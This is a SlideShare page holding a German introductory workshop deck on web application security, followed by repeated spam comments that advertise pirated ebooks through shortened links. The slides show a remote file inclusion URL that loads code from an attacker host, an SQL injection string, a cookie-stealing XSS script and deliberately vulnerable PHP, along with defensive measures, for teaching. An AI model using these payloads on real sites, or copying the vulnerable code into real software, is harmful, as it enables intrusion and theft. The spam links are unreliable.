Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Web Application Security

3 019 vues

Publié le

Web Application Security Introduction by Jonathan Weiss. Presented at the Juniter Workend 2006.

Publié dans : Technologie
  • DOWNLOAD THAT BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book that can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer that is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story That Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money That the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths that Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Répondre 
    Voulez-vous vraiment ?  Oui  Non
    Votre message apparaîtra ici
  • DOWNLOAD THAT BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book that can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer that is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story That Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money That the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths that Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Répondre 
    Voulez-vous vraiment ?  Oui  Non
    Votre message apparaîtra ici
  • DOWNLOAD THAT BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m77EgH } ......................................................................................................................... Download Full EPUB Ebook here { http://bit.ly/2m77EgH } ......................................................................................................................... Download Full doc Ebook here { http://bit.ly/2m77EgH } ......................................................................................................................... Download PDF EBOOK here { http://bit.ly/2m77EgH } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m77EgH } ......................................................................................................................... Download doc Ebook here { http://bit.ly/2m77EgH } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book that can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer that is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story That Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money That the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths that Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Répondre 
    Voulez-vous vraiment ?  Oui  Non
    Votre message apparaîtra ici
  • DOWNLOAD THAT BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book that can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer that is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story That Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money That the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths that Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Répondre 
    Voulez-vous vraiment ?  Oui  Non
    Votre message apparaîtra ici
  • -- DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT -- ......................................................................................................................... ......................................................................................................................... Download FULL PDF EBOOK here { http://bit.ly/2m77EgH } ......................................................................................................................... (Unlimited)
       Répondre 
    Voulez-vous vraiment ?  Oui  Non
    Votre message apparaîtra ici
  • Soyez le premier à aimer ceci

Web Application Security

  1. 1. Web Application Security
  2. 2. Agenda • Einführung und Einordung • Grundlagen Web Applications • Angriff • Verteidigung • Praktischer Teil • Fazit
  3. 3. Einführung
  4. 4. Was ist Security?
  5. 5. Security is a process Bruce Schneier
  6. 6. Angriff Angriff Ziel
  7. 7. Verteidigung Angriff Prevention Detection Response Ziel
  8. 8. Prevention Maßnahmen, die einen Angriff im Vorhinein erschweren sollen Reallife: Tür und Schloß an Euren Häusern IT: Firewalls, ACLs / Rechtemanagement
  9. 9. Detection Maßnahmen, die einen Angriff erkennen sollen Reallife: Alarmanlage im Haus IT: Intrusion Detection Systems, Networks Security Monitoring, Traffic Anomaly
  10. 10. Response Reaktion auf einen Angriff Reallife: Ihr ruft die Polizei, diese probiert den Einbrecher festzunehmen. Beweise werden gesammelt IT: Runterfahren des Rechners, forensiche Analyse
  11. 11. Agenda Angriff Prevention Detection Response Ziel Vorletztes Letzes Workend Workend
  12. 12. Agenda Dieser Workshop Angriff Prevention Detection Response Ziel Im Speziellen für Web Applications
  13. 13. Attack the enemy
  14. 14. Der Prozess Ziel auskundschaften
  15. 15. Der Prozess Ziel auskundschaften Schwachstellen ausfindigmachen
  16. 16. Der Prozess Ziel auskundschaften Schwachstellen ausfindigmachen Schwachstellen ausnutzten
  17. 17. Der Prozess Ziel auskundschaften Schwachstellen ausfindigmachen Schwachstellen ausnutzten Position sichern
  18. 18. Der IT-Prozess Ziel auskundschaften Passive Informationsgewinnung Aktive Informationsgewinnung Schwachstellen ausfindigmachen Remote Exploit Schwachstellen Local Exploit ausnutzten Rootkit Installation Position sichern Weitere Expansion
  19. 19. Angriff Passive Aktive Remote Local Root- Expan- IG IG Exploit Exploit kit sion - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........
  20. 20. Verteidigung Passive Aktive Remote Local Root- Expan- IG IG Exploit Exploit kit sion - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........
  21. 21. Grundlagen Web Applications
  22. 22. Statische Webseite GET http://www.juniter.de/index.html index.html
  23. 23. Dynamische Webseite GET http://www.juniter.de/index.php MySQL PHP index.php
  24. 24. Angriff
  25. 25. Angriff Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
  26. 26. Angriff Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
  27. 27. Ziel Informationen über • eingesetzten Server (Apache, IIS, ..) • Skriptsprache (PHP, JSP, ASP, Perl, Rails)
  28. 28. Mittel • Versiongrabbing / Verbinden • Typische Endungen • .php • .jsp • .do • .asp aspx
  29. 29. Angriff Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
  30. 30. Ziel • Webseite manipulieren • Datenbank manipulieren • Lokaler Benutzer für weitere Aktivitäten
  31. 31. Mittel Sicherheitslücken in • Serversoftware • Application Server • Programmiersprache • eigentliches Programm ausnutzen
  32. 32. Typische Schwachstellen • Remote code execution • SQL injection • Format string vulnerabilities • Cross Site Scripting (XSS) • Username enumeration
  33. 33. Remote code execution • register_globals • XMLRPC Schwachstellen
  34. 34. require ($page . quot;.phpquot;); http://www.vulnsite.com/index.php? page=http://www.attacker.com/attack.txt
  35. 35. Remote code execution http://www.vulnsite.com/index.php?page=http:// www.attacker.com/attack.txt
  36. 36. SQL Injection Idee: SQL-Anweisung im Code durch die HTML Parameter manipulieren
  37. 37. <form action=quot;sql.phpquot; method=quot;POSTquot; /> <p>Name: <input type=quot;textquot; name=quot;namequot; /><br /> <input type=quot;submitquot; value=quot;Add Commentquot; /></p> </form> <?php $query = quot;SELECT * FROM users WHERE username = '{$_POST ['username']}quot;; $result = mysql_query($query); ?>
  38. 38. $query = quot;SELECT * FROM users WHERE username = 'steve'quot;;
  39. 39. $query = quot;SELECT * FROM users WHERE username = '' or '1=1'quot;;
  40. 40. Cross Site Scripting Idee: Dem Server JavaScript Code übergeben, den er anderen Nutzern anzeigt. Diese führen dann diesen Code aus
  41. 41. Cross Site Scripting Wirkung: Cookies und somit Logins stehlen
  42. 42. <form action=quot;search.phpquot; method=quot;GETquot; /> Welcome!! <p>Enter your name: <input type=quot;textquot; name=quot;name_1quot; /><br /> <input type=quot;submitquot; value=quot;Goquot; /></p><br> </form> <?php echo quot;<p>Your Name <br />quot;; echo ($_GET[name_1]); ?>
  43. 43. http://victim_site/clean.php?name_1=<script>code</script> http://victim_site/clean.php?name_1=<script>alert (document.cookie);</script>
  44. 44. Username enumeration Idee: Finden von gültigen Benutzernamen durch Testen der Reaktion auf Username/ Passwort Kombination
  45. 45. Username enumeration Wirkung: Bruteforce und Guessing Attacken auf Benutzerkonten deutlich leichter
  46. 46. Username enumeration Der angegebene Login existiert nicht Die angegebene Login/Passwort Kombination stimmt nicht
  47. 47. Verteidigung
  48. 48. Verteidigung Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
  49. 49. Verteidigung Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
  50. 50. Prevention Vorbeugen durch: • Versionsanzeigen abschalten/verfremden • Intrusion Prevention Systeme
  51. 51. Detection Erkennen durch: • Intrusion Detection Systeme • Firewall Logfiles • Serverlogfiles, z.B. UserAgent in Apache Logfile
  52. 52. Verteidigung Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
  53. 53. Prevention Vorbeugen durch: • Systeme immer aktuell halten • Applikation Firewalls / Filter • mod_security • Intrusion Prevention Systeme • Snort-Inline
  54. 54. Secure Coding !
  55. 55. Detection Erkennen durch: • Intrusion Detection Systeme • Logfiles • Netzwerküberwachung • netstat • Network Security Monitoring
  56. 56. Fazit
  57. 57. Ressourcen
  58. 58. Bücher • Unix and Internet Security, Simson Garfikel&co, O’Reilly • Network Security Assesment, ..., O’Reilly • Network Security Monitoring, Richard Beijtrich, Addison-Wesley • Security Warrior, ..., O’Reilly • Practical Cryptography, Bruce Schneier&Nils Fergusson,... • ..., Bruce Sterling, ...
  59. 59. Mailing Listen • Bugtraq • Full-Disclosure • SecurityFocus • IDS • WebAppSec • Nmap
  60. 60. Web • Securityfocus.com • OWASP • Phrack.org • grc.com • CVE, MITRE, ISS X-Force
  61. 61. Fragen?

×